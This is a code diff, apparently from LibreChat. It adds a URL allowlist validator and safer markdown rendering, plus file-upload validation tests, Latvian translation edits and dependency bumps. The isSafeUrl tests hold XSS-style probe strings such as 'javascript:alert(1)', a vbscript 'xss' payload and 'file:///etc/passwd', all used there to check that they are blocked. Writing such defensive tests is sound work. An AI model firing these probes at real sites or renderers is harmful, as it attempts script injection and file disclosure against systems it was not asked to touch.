ikreizējai meklēšanai.",
"com_assistants_function_use": "Izmantotais asistents {{0}}", "com_assistants_function_use": "Izmantotais asistents {{0}}",
"com_assistants_image_vision": "Attēla redzējums", "com_assistants_image_vision": "Attēla redzējums",
@ -136,7 +136,7 @@
"com_assistants_knowledge_info": "Ja augšupielādējat failus sadaļā Zināšanas, sarunās ar asistentu var tikt iekļauts faila saturs.", "com_assistants_knowledge_info": "Ja augšupielādējat failus sadaļā Zināšanas, sarunās ar asistentu var tikt iekļauts faila saturs.",
"com_assistants_max_starters_reached": "Sasniegts maksimālais sarunu uzsākšanas iespēju skaits", "com_assistants_max_starters_reached": "Sasniegts maksimālais sarunu uzsākšanas iespēju skaits",
"com_assistants_name_placeholder": "Pēc izvēles: Asistenta nosaukums", "com_assistants_name_placeholder": "Pēc izvēles: Asistenta nosaukums",
"com_assistants_non_retrieval_model": "Šajā modelī vektorizētā meklēšana nav iespējota. Lūdzu, izvēlieties citu modeli.", "com_assistants_non_retrieval_model": "Šajā modelī meklēšana dokumentos nav iespējota. Lūdzu, izvēlieties citu modeli.",
"com_assistants_retrieval": "Atgūšana", "com_assistants_retrieval": "Atgūšana",
"com_assistants_running_action": "Darbība palaista", "com_assistants_running_action": "Darbība palaista",
"com_assistants_running_var": "Strādā {{0}}", "com_assistants_running_var": "Strādā {{0}}",
@ -232,7 +232,7 @@
"com_endpoint_anthropic_thinking_budget": "Nosaka maksimālo žetonu skaitu, ko Claude drīkst izmantot savā iekšējā spriešanas procesā. Lielāki budžeti var uzlabot atbilžu kvalitāti, nodrošinot rūpīgāku analīzi sarežģītām problēmām, lai gan Claude var neizmantot visu piešķirto budžetu, īpaši diapazonos virs 32 000. Šim iestatījumam jābūt zemākam par \"Maksimālie izvades tokeni\".", "com_endpoint_anthropic_thinking_budget": "Nosaka maksimālo žetonu skaitu, ko Claude drīkst izmantot savā iekšējā spriešanas procesā. Lielāki budžeti var uzlabot atbilžu kvalitāti, nodrošinot rūpīgāku analīzi sarežģītām problēmām, lai gan Claude var neizmantot visu piešķirto budžetu, īpaši diapazonos virs 32 000. Šim iestatījumam jābūt zemākam par \"Maksimālie izvades tokeni\".",
"com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).", "com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).",
"com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.", "com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.",
"com_endpoint_anthropic_use_web_search": "Iespējojiet tīmekļa meklēšanas funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.", "com_endpoint_anthropic_use_web_search": "Iespējojiet meklēšanu tīmeklī funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.",
"com_endpoint_assistant": "Asistents", "com_endpoint_assistant": "Asistents",
"com_endpoint_assistant_model": "Asistenta modelis", "com_endpoint_assistant_model": "Asistenta modelis",
"com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.", "com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.",
@ -1486,7 +1486,7 @@
"com_ui_version_var": "Versija {{0}}", "com_ui_version_var": "Versija {{0}}",
"com_ui_versions": "Versijas", "com_ui_versions": "Versijas",
"com_ui_view_memory": "Skatīt atmiņu", "com_ui_view_memory": "Skatīt atmiņu",
"com_ui_web_search": "Tīmekļa meklēšana", "com_ui_web_search": "Meklēšana tīmeklī",
"com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu", "com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu",
"com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)", "com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)",
"com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu", "com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu",

View file

@ -1,4 +1,72 @@
import { getMarkdownFiles } from '../markdown'; import { isSafeUrl, getMarkdownFiles } from '../markdown';
describe('isSafeUrl', () => {
it('allows https URLs', () => {
expect(isSafeUrl('https://example.com')).toBe(true);
});
it('allows http URLs', () => {
expect(isSafeUrl('http://example.com/path')).toBe(true);
});
it('allows mailto links', () => {
expect(isSafeUrl('mailto:user@example.com')).toBe(true);
});
it('allows tel links', () => {
expect(isSafeUrl('tel:+1234567890')).toBe(true);
});
it('allows relative paths', () => {
expect(isSafeUrl('/path/to/page')).toBe(true);
expect(isSafeUrl('./relative')).toBe(true);
expect(isSafeUrl('../parent')).toBe(true);
});
it('allows anchor links', () => {
expect(isSafeUrl('#section')).toBe(true);
});
it('blocks javascript: protocol', () => {
expect(isSafeUrl('javascript:alert(1)')).toBe(false);
});
it('blocks javascript: with leading whitespace', () => {
expect(isSafeUrl(' javascript:alert(1)')).toBe(false);
});
it('blocks javascript: with mixed case', () => {
expect(isSafeUrl('JavaScript:alert(1)')).toBe(false);
});
it('blocks data: protocol', () => {
expect(isSafeUrl('data:text/html,<b>x</b>')).toBe(false);
});
it('blocks blob: protocol', () => {
expect(isSafeUrl('blob:http://example.com/uuid')).toBe(false);
});
it('blocks vbscript: protocol', () => {
expect(isSafeUrl('vbscript:MsgBox("xss")')).toBe(false);
});
it('blocks file: protocol', () => {
expect(isSafeUrl('file:///etc/passwd')).toBe(false);
});
it('blocks empty strings', () => {
expect(isSafeUrl('')).toBe(false);
});
it('blocks whitespace-only strings', () => {
expect(isSafeUrl(' ')).toBe(false);
});
it('blocks unknown/custom protocols', () => {
expect(isSafeUrl('custom:payload')).toBe(false);
});
});
describe('markdown artifacts', () => { describe('markdown artifacts', () => {
describe('getMarkdownFiles', () => { describe('getMarkdownFiles', () => {
@ -41,7 +109,7 @@ describe('markdown artifacts', () => {
const markdown = '# Test'; const markdown = '# Test';
const files = getMarkdownFiles(markdown); const files = getMarkdownFiles(markdown);
expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('import Markdown from'); expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('import ReactMarkdown from');
expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('MarkdownRendererProps'); expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('MarkdownRendererProps');
expect(files['/components/ui/MarkdownRenderer.tsx']).toContain( expect(files['/components/ui/MarkdownRenderer.tsx']).toContain(
'export default MarkdownRenderer', 'export default MarkdownRenderer',
@ -162,13 +230,29 @@ describe('markdown artifacts', () => {
}); });
describe('markdown component structure', () => { describe('markdown component structure', () => {
it('should generate a MarkdownRenderer component that uses marked-react', () => { it('should generate a MarkdownRenderer component with safe markdown rendering', () => {
const files = getMarkdownFiles('# Test'); const files = getMarkdownFiles('# Test');
const rendererCode = files['/components/ui/MarkdownRenderer.tsx']; const rendererCode = files['/components/ui/MarkdownRenderer.tsx'];
// Verify the component imports and uses Markdown from marked-react expect(rendererCode).toContain("import ReactMarkdown from 'react-markdown'");
expect(rendererCode).toContain("import Markdown from 'marked-react'"); expect(rendererCode).toContain("import remarkBreaks from 'remark-breaks'");
expect(rendererCode).toContain('<Markdown gfm={true} breaks={true}>{content}</Markdown>'); expect(rendererCode).toContain('skipHtml={true}');
expect(rendererCode).toContain('SAFE_PROTOCOLS');
expect(rendererCode).toContain('isSafeUrl');
expect(rendererCode).toContain('urlTransform={urlTransform}');
expect(rendererCode).toContain('remarkPlugins={remarkPlugins}');
expect(rendererCode).toContain('isSafeUrl(url) ? url : null');
});
it('should embed isSafeUrl logic matching the exported version', () => {
const files = getMarkdownFiles('# Test');
const rendererCode = files['/components/ui/MarkdownRenderer.tsx'];
expect(rendererCode).toContain("new Set(['http:', 'https:', 'mailto:', 'tel:'])");
expect(rendererCode).toContain('new URL(trimmed).protocol');
expect(rendererCode).toContain("trimmed.startsWith('/')");
expect(rendererCode).toContain("trimmed.startsWith('#')");
expect(rendererCode).toContain("trimmed.startsWith('.')");
}); });
it('should pass markdown content to the Markdown component', () => { it('should pass markdown content to the Markdown component', () => {

View file

@ -0,0 +1,172 @@
import { megabyte, fileConfig as defaultFileConfig } from 'librechat-data-provider';
import type { EndpointFileConfig, FileConfig } from 'librechat-data-provider';
import type { ExtendedFile } from '~/common';
import { validateFiles } from '../files';
const supportedMimeTypes = defaultFileConfig.endpoints.default.supportedMimeTypes;
function makeEndpointConfig(overrides: Partial<EndpointFileConfig> = {}): EndpointFileConfig {
return {
fileLimit: 10,
fileSizeLimit: 25 * megabyte,
totalSizeLimit: 100 * megabyte,
supportedMimeTypes,
disabled: false,
...overrides,
};
}
function makeFile(name: string, type: string, size: number): File {
const content = new ArrayBuffer(size);
return new File([content], name, { type });
}
function makeExtendedFile(overrides: Partial<ExtendedFile> = {}): ExtendedFile {
return {
file_id: 'ext-1',
size: 1024,
progress: 1,
type: 'application/pdf',
...overrides,
};
}
describe('validateFiles', () => {
let setError: jest.Mock;
let files: Map<string, ExtendedFile>;
let endpointFileConfig: EndpointFileConfig;
const fileConfig: FileConfig | null = null;
beforeEach(() => {
setError = jest.fn();
files = new Map();
endpointFileConfig = makeEndpointConfig();
});
it('returns true when all checks pass', () => {
const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(true);
expect(setError).not.toHaveBeenCalled();
});
it('rejects when endpoint is disabled', () => {
endpointFileConfig = makeEndpointConfig({ disabled: true });
const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('com_ui_attach_error_disabled');
});
it('rejects empty files (zero bytes)', () => {
const fileList = [makeFile('empty.pdf', 'application/pdf', 0)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('com_error_files_empty');
});
it('rejects when fileLimit would be exceeded', () => {
endpointFileConfig = makeEndpointConfig({ fileLimit: 3 });
files = new Map([
['f1', makeExtendedFile({ file_id: 'f1', filename: 'one.pdf', size: 2048 })],
['f2', makeExtendedFile({ file_id: 'f2', filename: 'two.pdf', size: 3072 })],
]);
const fileList = [
makeFile('a.pdf', 'application/pdf', 1024),
makeFile('b.pdf', 'application/pdf', 2048),
];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('File limit reached: 3 files');
});
it('allows upload when exactly at fileLimit boundary', () => {
endpointFileConfig = makeEndpointConfig({ fileLimit: 3 });
files = new Map([
['f1', makeExtendedFile({ file_id: 'f1', filename: 'one.pdf', size: 2048 })],
['f2', makeExtendedFile({ file_id: 'f2', filename: 'two.pdf', size: 3072 })],
]);
const fileList = [makeFile('a.pdf', 'application/pdf', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(true);
});
it('rejects unsupported MIME type', () => {
const fileList = [makeFile('data.xyz', 'application/x-unknown', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('Unsupported file type: application/x-unknown');
});
it('rejects when file size equals fileSizeLimit (>= comparison)', () => {
const limit = 5 * megabyte;
endpointFileConfig = makeEndpointConfig({ fileSizeLimit: limit });
const fileList = [makeFile('exact.pdf', 'application/pdf', limit)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith(`File size limit exceeded: ${limit / megabyte} MB`);
});
it('allows file just under fileSizeLimit', () => {
const limit = 5 * megabyte;
endpointFileConfig = makeEndpointConfig({ fileSizeLimit: limit });
const fileList = [makeFile('under.pdf', 'application/pdf', limit - 1)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(true);
});
it('rejects when totalSizeLimit would be exceeded', () => {
const limit = 10 * megabyte;
endpointFileConfig = makeEndpointConfig({ totalSizeLimit: limit });
files = new Map([['f1', makeExtendedFile({ file_id: 'f1', size: 6 * megabyte })]]);
const fileList = [makeFile('big.pdf', 'application/pdf', 5 * megabyte)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith(`Total file size limit exceeded: ${limit / megabyte} MB`);
});
it('allows when totalSizeLimit is exactly met', () => {
const limit = 10 * megabyte;
endpointFileConfig = makeEndpointConfig({ totalSizeLimit: limit });
files = new Map([['f1', makeExtendedFile({ file_id: 'f1', size: 5 * megabyte })]]);
const fileList = [makeFile('fits.pdf', 'application/pdf', 5 * megabyte)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(true);
});
it('rejects duplicate files', () => {
files = new Map([
[
'f1',
makeExtendedFile({
file_id: 'f1',
file: makeFile('doc.pdf', 'application/pdf', 1024),
filename: 'doc.pdf',
size: 1024,
type: 'application/pdf',
}),
],
]);
const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)];
const result = validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(result).toBe(false);
expect(setError).toHaveBeenCalledWith('com_error_files_dupe');
});
it('enforces check ordering: disabled before fileLimit', () => {
endpointFileConfig = makeEndpointConfig({ disabled: true, fileLimit: 1 });
files = new Map([['f1', makeExtendedFile({ file_id: 'f1', filename: 'existing.pdf' })]]);
const fileList = [makeFile('doc.pdf', 'application/pdf', 1024)];
validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(setError).toHaveBeenCalledWith('com_ui_attach_error_disabled');
});
it('enforces check ordering: fileLimit before fileSizeLimit', () => {
const limit = 1;
endpointFileConfig = makeEndpointConfig({ fileLimit: 1, fileSizeLimit: limit });
files = new Map([['f1', makeExtendedFile({ file_id: 'f1', filename: 'existing.pdf' })]]);
const fileList = [makeFile('huge.pdf', 'application/pdf', limit)];
validateFiles({ files, fileList, setError, endpointFileConfig, fileConfig });
expect(setError).toHaveBeenCalledWith('File limit reached: 1 files');
});
});

View file

@ -108,7 +108,9 @@ const mermaidDependencies = {
}; };
const markdownDependencies = { const markdownDependencies = {
'marked-react': '^2.0.0', 'remark-gfm': '^4.0.0',
'remark-breaks': '^4.0.0',
'react-markdown': '^9.0.1',
}; };
const dependenciesMap: Record< const dependenciesMap: Record<

View file

@ -251,7 +251,7 @@ export const validateFiles = ({
const currentTotalSize = existingFiles.reduce((total, file) => total + file.size, 0); const currentTotalSize = existingFiles.reduce((total, file) => total + file.size, 0);
if (fileLimit && fileList.length + files.size > fileLimit) { if (fileLimit && fileList.length + files.size > fileLimit) {
setError(`You can only upload up to ${fileLimit} files at a time.`); setError(`File limit reached: ${fileLimit} files`);
return false; return false;
} }
@ -282,19 +282,18 @@ export const validateFiles = ({
} }
if (!checkType(originalFile.type, mimeTypesToCheck)) { if (!checkType(originalFile.type, mimeTypesToCheck)) {
console.log(originalFile); setError(`Unsupported file type: ${originalFile.type}`);
setError('Currently, unsupported file type: ' + originalFile.type);
return false; return false;
} }
if (fileSizeLimit && originalFile.size >= fileSizeLimit) { if (fileSizeLimit && originalFile.size >= fileSizeLimit) {
setError(`File size exceeds ${fileSizeLimit / megabyte} MB.`); setError(`File size limit exceeded: ${fileSizeLimit / megabyte} MB`);
return false; return false;
} }
} }
if (totalSizeLimit && currentTotalSize + incomingTotalSize > totalSizeLimit) { if (totalSizeLimit && currentTotalSize + incomingTotalSize > totalSizeLimit) {
setError(`The total size of the files cannot exceed ${totalSizeLimit / megabyte} MB.`); setError(`Total file size limit exceeded: ${totalSizeLimit / megabyte} MB`);
return false; return false;
} }

View file

@ -1,12 +1,53 @@
import dedent from 'dedent'; import dedent from 'dedent';
const markdownRenderer = dedent(`import React, { useEffect, useState } from 'react'; const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']);
import Markdown from 'marked-react';
/**
* Allowlist-based URL validator for markdown artifact rendering.
* Mirrored verbatim in the markdownRenderer template string below
* any logic change MUST be applied to both copies.
*/
export const isSafeUrl = (url: string): boolean => {
const trimmed = url.trim();
if (!trimmed) {
return false;
}
if (trimmed.startsWith('/') || trimmed.startsWith('#') || trimmed.startsWith('.')) {
return true;
}
try {
return SAFE_PROTOCOLS.has(new URL(trimmed).protocol);
} catch {
return false;
}
};
const markdownRenderer = dedent(`import React from 'react';
import remarkGfm from 'remark-gfm';
import remarkBreaks from 'remark-breaks';
import ReactMarkdown from 'react-markdown';
interface MarkdownRendererProps { interface MarkdownRendererProps {
content: string; content: string;
} }
/** Mirror of the exported isSafeUrl in markdown.ts — keep in sync. */
const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']);
const isSafeUrl = (url: string): boolean => {
const trimmed = url.trim();
if (!trimmed) return false;
if (trimmed.startsWith('/') || trimmed.startsWith('#') || trimmed.startsWith('.')) return true;
try {
return SAFE_PROTOCOLS.has(new URL(trimmed).protocol);
} catch {
return false;
}
};
const remarkPlugins = [remarkGfm, remarkBreaks];
const urlTransform = (url: string) => (isSafeUrl(url) ? url : null);
const MarkdownRenderer: React.FC<MarkdownRendererProps> = ({ content }) => { const MarkdownRenderer: React.FC<MarkdownRendererProps> = ({ content }) => {
return ( return (
<div <div
@ -17,7 +58,13 @@ const MarkdownRenderer: React.FC<MarkdownRendererProps> = ({ content }) => {
minHeight: '100vh' minHeight: '100vh'
}} }}
> >
<Markdown gfm={true} breaks={true}>{content}</Markdown> <ReactMarkdown
remarkPlugins={remarkPlugins}
skipHtml={true}
urlTransform={urlTransform}
>
{content}
</ReactMarkdown>
</div> </div>
); );
}; };

242
package-lock.json generated
View file

@ -59,13 +59,14 @@
"@google/genai": "^1.19.0", "@google/genai": "^1.19.0",
"@keyv/redis": "^4.3.3", "@keyv/redis": "^4.3.3",
"@langchain/core": "^0.3.80", "@langchain/core": "^0.3.80",
"@librechat/agents": "^3.1.55", "@librechat/agents": "^3.1.56",
"@librechat/api": "*", "@librechat/api": "*",
"@librechat/data-schemas": "*", "@librechat/data-schemas": "*",
"@microsoft/microsoft-graph-client": "^3.0.7", "@microsoft/microsoft-graph-client": "^3.0.7",
"@modelcontextprotocol/sdk": "^1.27.1", "@modelcontextprotocol/sdk": "^1.27.1",
"@node-saml/passport-saml": "^5.1.0", "@node-saml/passport-saml": "^5.1.0",
"@smithy/node-http-handler": "^4.4.5", "@smithy/node-http-handler": "^4.4.5",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"bcryptjs": "^2.4.3", "bcryptjs": "^2.4.3",
"compression": "^1.8.1", "compression": "^1.8.1",
@ -81,7 +82,7 @@
"express-rate-limit": "^8.3.0", "express-rate-limit": "^8.3.0",
"express-session": "^1.18.2", "express-session": "^1.18.2",
"express-static-gzip": "^2.2.0", "express-static-gzip": "^2.2.0",
"file-type": "^18.7.0", "file-type": "^21.3.2",
"firebase": "^11.0.2", "firebase": "^11.0.2",
"form-data": "^4.0.4", "form-data": "^4.0.4",
"handlebars": "^4.7.7", "handlebars": "^4.7.7",
@ -121,10 +122,9 @@
"pdfjs-dist": "^5.4.624", "pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0", "rate-limit-redis": "^4.2.0",
"sharp": "^0.33.5", "sharp": "^0.33.5",
"tiktoken": "^1.0.15",
"traverse": "^0.6.7", "traverse": "^0.6.7",
"ua-parser-js": "^1.0.36", "ua-parser-js": "^1.0.36",
"undici": "^7.18.2", "undici": "^7.24.1",
"winston": "^3.11.0", "winston": "^3.11.0",
"winston-daily-rotate-file": "^5.0.0", "winston-daily-rotate-file": "^5.0.0",
"xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz", "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz",
@ -270,6 +270,24 @@
"node": ">= 0.8.0" "node": ">= 0.8.0"
} }
}, },
"api/node_modules/file-type": {
"version": "21.3.2",
"resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.2.tgz",
"integrity": "sha512-DLkUvGwep3poOV2wpzbHCOnSKGk1LzyXTv+aHFgN2VFl96wnp8YA9YjO2qPzg5PuL8q/SW9Pdi6WTkYOIh995w==",
"license": "MIT",
"dependencies": {
"@tokenizer/inflate": "^0.4.1",
"strtok3": "^10.3.4",
"token-types": "^6.1.1",
"uint8array-extras": "^1.4.0"
},
"engines": {
"node": ">=20"
},
"funding": {
"url": "https://github.com/sindresorhus/file-type?sponsor=1"
}
},
"api/node_modules/jose": { "api/node_modules/jose": {
"version": "6.1.3", "version": "6.1.3",
"resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz", "resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz",
@ -348,6 +366,40 @@
"@img/sharp-win32-x64": "0.33.5" "@img/sharp-win32-x64": "0.33.5"
} }
}, },
"api/node_modules/strtok3": {
"version": "10.3.4",
"resolved": "https://registry.npmjs.org/strtok3/-/strtok3-10.3.4.tgz",
"integrity": "sha512-KIy5nylvC5le1OdaaoCJ07L+8iQzJHGH6pWDuzS+d07Cu7n1MZ2x26P8ZKIWfbK02+XIL8Mp4RkWeqdUCrDMfg==",
"license": "MIT",
"dependencies": {
"@tokenizer/token": "^0.3.0"
},
"engines": {
"node": ">=18"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"api/node_modules/token-types": {
"version": "6.1.2",
"resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz",
"integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==",
"license": "MIT",
"dependencies": {
"@borewit/text-codec": "^0.2.1",
"@tokenizer/token": "^0.3.0",
"ieee754": "^1.2.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"api/node_modules/winston-daily-rotate-file": { "api/node_modules/winston-daily-rotate-file": {
"version": "5.0.0", "version": "5.0.0",
"resolved": "https://registry.npmjs.org/winston-daily-rotate-file/-/winston-daily-rotate-file-5.0.0.tgz", "resolved": "https://registry.npmjs.org/winston-daily-rotate-file/-/winston-daily-rotate-file-5.0.0.tgz",
@ -7286,6 +7338,16 @@
"dev": true, "dev": true,
"license": "MIT" "license": "MIT"
}, },
"node_modules/@borewit/text-codec": {
"version": "0.2.2",
"resolved": "https://registry.npmjs.org/@borewit/text-codec/-/text-codec-0.2.2.tgz",
"integrity": "sha512-DDaRehssg1aNrH4+2hnj1B7vnUGEjU6OIlyRdkMd0aUdIUvKXrJfXsy8LVtXAy7DRvYVluWbMspsRhz2lcW0mQ==",
"license": "MIT",
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/@braintree/sanitize-url": { "node_modules/@braintree/sanitize-url": {
"version": "7.1.1", "version": "7.1.1",
"resolved": "https://registry.npmjs.org/@braintree/sanitize-url/-/sanitize-url-7.1.1.tgz", "resolved": "https://registry.npmjs.org/@braintree/sanitize-url/-/sanitize-url-7.1.1.tgz",
@ -12262,9 +12324,9 @@
} }
}, },
"node_modules/@librechat/agents": { "node_modules/@librechat/agents": {
"version": "3.1.55", "version": "3.1.56",
"resolved": "https://registry.npmjs.org/@librechat/agents/-/agents-3.1.55.tgz", "resolved": "https://registry.npmjs.org/@librechat/agents/-/agents-3.1.56.tgz",
"integrity": "sha512-impxeKpCDlPkAVQFWnA6u6xkxDSBR/+H8uYq7rZomBeu0rUh/OhJLiI1fAwPhKXP33udNtHA8GyDi0QJj78R9w==", "integrity": "sha512-HJJwRnLM4XKpTWB4/wPDJR+iegyKBVUwqj7A8QHqzEcHzjKJDTr3wBPxZVH1tagGr6/mbbnErOJ14cH1OSNmpA==",
"license": "MIT", "license": "MIT",
"dependencies": { "dependencies": {
"@anthropic-ai/sdk": "^0.73.0", "@anthropic-ai/sdk": "^0.73.0",
@ -12285,6 +12347,7 @@
"@langfuse/tracing": "^4.3.0", "@langfuse/tracing": "^4.3.0",
"@opentelemetry/sdk-node": "^0.207.0", "@opentelemetry/sdk-node": "^0.207.0",
"@scarf/scarf": "^1.4.0", "@scarf/scarf": "^1.4.0",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"cheerio": "^1.0.0", "cheerio": "^1.0.0",
"dotenv": "^16.4.7", "dotenv": "^16.4.7",
@ -20799,6 +20862,41 @@
"@testing-library/dom": ">=7.21.4" "@testing-library/dom": ">=7.21.4"
} }
}, },
"node_modules/@tokenizer/inflate": {
"version": "0.4.1",
"resolved": "https://registry.npmjs.org/@tokenizer/inflate/-/inflate-0.4.1.tgz",
"integrity": "sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA==",
"license": "MIT",
"dependencies": {
"debug": "^4.4.3",
"token-types": "^6.1.1"
},
"engines": {
"node": ">=18"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/@tokenizer/inflate/node_modules/token-types": {
"version": "6.1.2",
"resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz",
"integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==",
"license": "MIT",
"dependencies": {
"@borewit/text-codec": "^0.2.1",
"@tokenizer/token": "^0.3.0",
"ieee754": "^1.2.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/@tokenizer/token": { "node_modules/@tokenizer/token": {
"version": "0.3.0", "version": "0.3.0",
"resolved": "https://registry.npmjs.org/@tokenizer/token/-/token-0.3.0.tgz", "resolved": "https://registry.npmjs.org/@tokenizer/token/-/token-0.3.0.tgz",
@ -22230,6 +22328,20 @@
"node": ">= 14" "node": ">= 14"
} }
}, },
"node_modules/ai-tokenizer": {
"version": "1.0.6",
"resolved": "https://registry.npmjs.org/ai-tokenizer/-/ai-tokenizer-1.0.6.tgz",
"integrity": "sha512-GaakQFxen0pRH/HIA4v68ZM40llCH27HUYUSBLK+gVuZ57e53pYJe1xFvSTj4sJJjbWU92m1X6NjPWyeWkFDow==",
"license": "MIT",
"peerDependencies": {
"ai": "^5.0.0"
},
"peerDependenciesMeta": {
"ai": {
"optional": true
}
}
},
"node_modules/ajv": { "node_modules/ajv": {
"version": "8.18.0", "version": "8.18.0",
"resolved": "https://registry.npmjs.org/ajv/-/ajv-8.18.0.tgz", "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.18.0.tgz",
@ -27499,22 +27611,6 @@
"moment": "^2.29.1" "moment": "^2.29.1"
} }
}, },
"node_modules/file-type": {
"version": "18.7.0",
"resolved": "https://registry.npmjs.org/file-type/-/file-type-18.7.0.tgz",
"integrity": "sha512-ihHtXRzXEziMrQ56VSgU7wkxh55iNchFkosu7Y9/S+tXHdKyrGjVK0ujbqNnsxzea+78MaLhN6PGmfYSAv1ACw==",
"dependencies": {
"readable-web-to-node-stream": "^3.0.2",
"strtok3": "^7.0.0",
"token-types": "^5.0.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"url": "https://github.com/sindresorhus/file-type?sponsor=1"
}
},
"node_modules/filelist": { "node_modules/filelist": {
"version": "1.0.6", "version": "1.0.6",
"resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.6.tgz", "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.6.tgz",
@ -28803,9 +28899,9 @@
"integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==" "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ=="
}, },
"node_modules/hono": { "node_modules/hono": {
"version": "4.12.5", "version": "4.12.7",
"resolved": "https://registry.npmjs.org/hono/-/hono-4.12.5.tgz", "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.7.tgz",
